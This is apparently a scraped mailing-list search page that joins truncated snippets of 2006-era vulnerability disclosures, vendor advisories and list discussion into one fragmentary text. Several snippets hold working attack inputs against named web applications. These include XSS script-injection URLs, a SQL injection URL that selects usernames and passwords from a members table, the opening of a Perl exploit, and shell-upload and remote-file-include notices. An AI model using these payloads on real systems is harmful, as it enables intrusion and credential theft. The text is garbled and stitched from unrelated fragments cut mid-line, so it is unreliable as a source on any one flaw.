I have written FAQ document including 23 items about the new Excel 0-day
vulnerability exploited by Trojan.
The document entitled as Microsoft Excel 0-day Vulnerability FAQ is located at
http://blogs.securiteam.com/index.php/archives/451
Permalink-type URL to the FAQ is http://blogs.securiteam.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00692635
Version: 2
HPSBTU02116 SSRT061135 rev.2 - HP Tru64 UNIX and HP Internet Express for Tru64
UNIX
Running sendmail, Remote Execution of Arbitrary Code or Denial of Service (DoS)
NOTICE:
http://target.xx/search.php?q=&r=0&s=Search&in=1&ex=1&ep=
%27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%
3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=
--
Submit comment
Subject: '>alert(/XSS/)
Click Reply to this you comment.
Ellipsis Security
http://www.ellsec.o
As of Version SixCMS 6.0.6patch2 this Bug is fixed. The patch can be downloaded
from our support site.
=
Discovered By: CrAzY CrAcKeR
Site: www.alshmokh.com
I want to thank my friend:-
nono225-mHOn-rageh-Lover Hacker-Brh
BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
=
Example:-
/rank.php?MemberID=[SQL
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The InfoGuard Group Vulnerability Summary 2006-04
Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: [EMAIL
=
Discovered By: CrAzY CrAcKeR
Site:www.alshmokh.com
I want to thank my friend:-
nono225-mHOn-rageh-Lover Hacker-Brh
BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
=
Example:-
/message. php?UserID=[SQ
#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full
Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;
# Header
print "\r\n+---
=
Discovered By: CrAzY CrAcKeR
Site:www.alshmokh.com
I want to thank my friend:-
nono225-mHOn-rageh-Lover Hacker-Brh
BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
=
Example:-
/lng.php?QuranID=[SQL]
=
Discovered By: CrAzY CrAcKeR
Site:www.alshmokh.com
I want to thank my friend:-
nono225-mHOn-rageh-Lover Hacker-Brh
BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
=
Example:-
/misc.php?action=[SQL]
---
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Crit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
> this is an unfair comparison, i think, and you're not the first to make
> such an argument. PHP is a language, one that lends itself to insecure
> paradigms and practices. but, so does C and it's built in string handling
> functions, and that's a similar source of security bugs over the years.
>
Easy CMS 0.1.2 Php Shell Upload Vulnerabilities
site:http://sourceforge.net/projects/php-easy-cms/
demo:http://www.easy-cms.be/
--
Bug:
1)http://victim/choose_file.php
Documents
Produce : singapore gallery
Versions : 0.10.0 and prior
Site : http://www.sgal.org/
Discovred By : Moroccan Security Research Team (Simo64)
Greetz: CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad -
Rachid
.:r00tkita - s4mi - Silitix - tah
# There is sql injection WeBBoA Hosting Script
# Rish=High
Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
Hey
look this
http://www.securityfocus.com/archive/1/428976
i found this bugs in Mar 27 2006
http://www.worlddefacers.de/Public/WD-TMPLH.txt
Dragons Kingdom Script v1.0
Homepage:
http://www.dkscript.com/
Affected files:
*Sending mail:
- Sending in-game mail
*Character Profiles:
- All input boxes of the profile
* Posting & Replying in the forum:
- Posting in the forum
- Replying in the forum
* Form spoofing can occur i
On Jun 16, 2006, at 5:21 AM, Darren Reed wrote:
[Funny commentary picking on PHP deleted]
For those of us that have to administer shared hosting servers where
customers can and do build/install very poorly written web
applications it can be a full time job trying to protect your
server.
Credit's : n00b
email : [EMAIL PROTECTED]
Erm was wondering if you could take a close look at this it is a 0day dos
exploit by me i found tonight in vmware i have even debug for you guy's to take
a look at.I hope you guy's will put it up after checking through it.Ok the
first thing is v
+vendor : http://www.qto.com
+poral : qto file manager
+version : All version !
Exploit:
+http://www.xxx.xom/qto/index.php?msg=[xss]
MPCS v0.2
Homepage:
http://tpvgames.co.uk/mpcs
Affected files:
comment.php
XSS vuln with cookie & full path disclosure:
Direct html injection doesnt seem to work, however, if you navigate to the code
below in your browser, and then post a comment on the same page, our XSS
example will
V3 Chat Instant Messenger
http://www.v3chat.com/
Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
* Editing your profile:
- input boxes
--
Mail Vuln
I. SYNOPSIS
Release Date: 07/19/2006
Affected Application: Cisco CallManager 3.1 and up (versions prior to 3.1 were
not tested but may
still be vulnerable)
Severity If Exploited: High
Impact: Arbitrary configuration of phone system/Theft of individual phone
users' credentials
Mitigating Fact
25 matches
Mail list logo
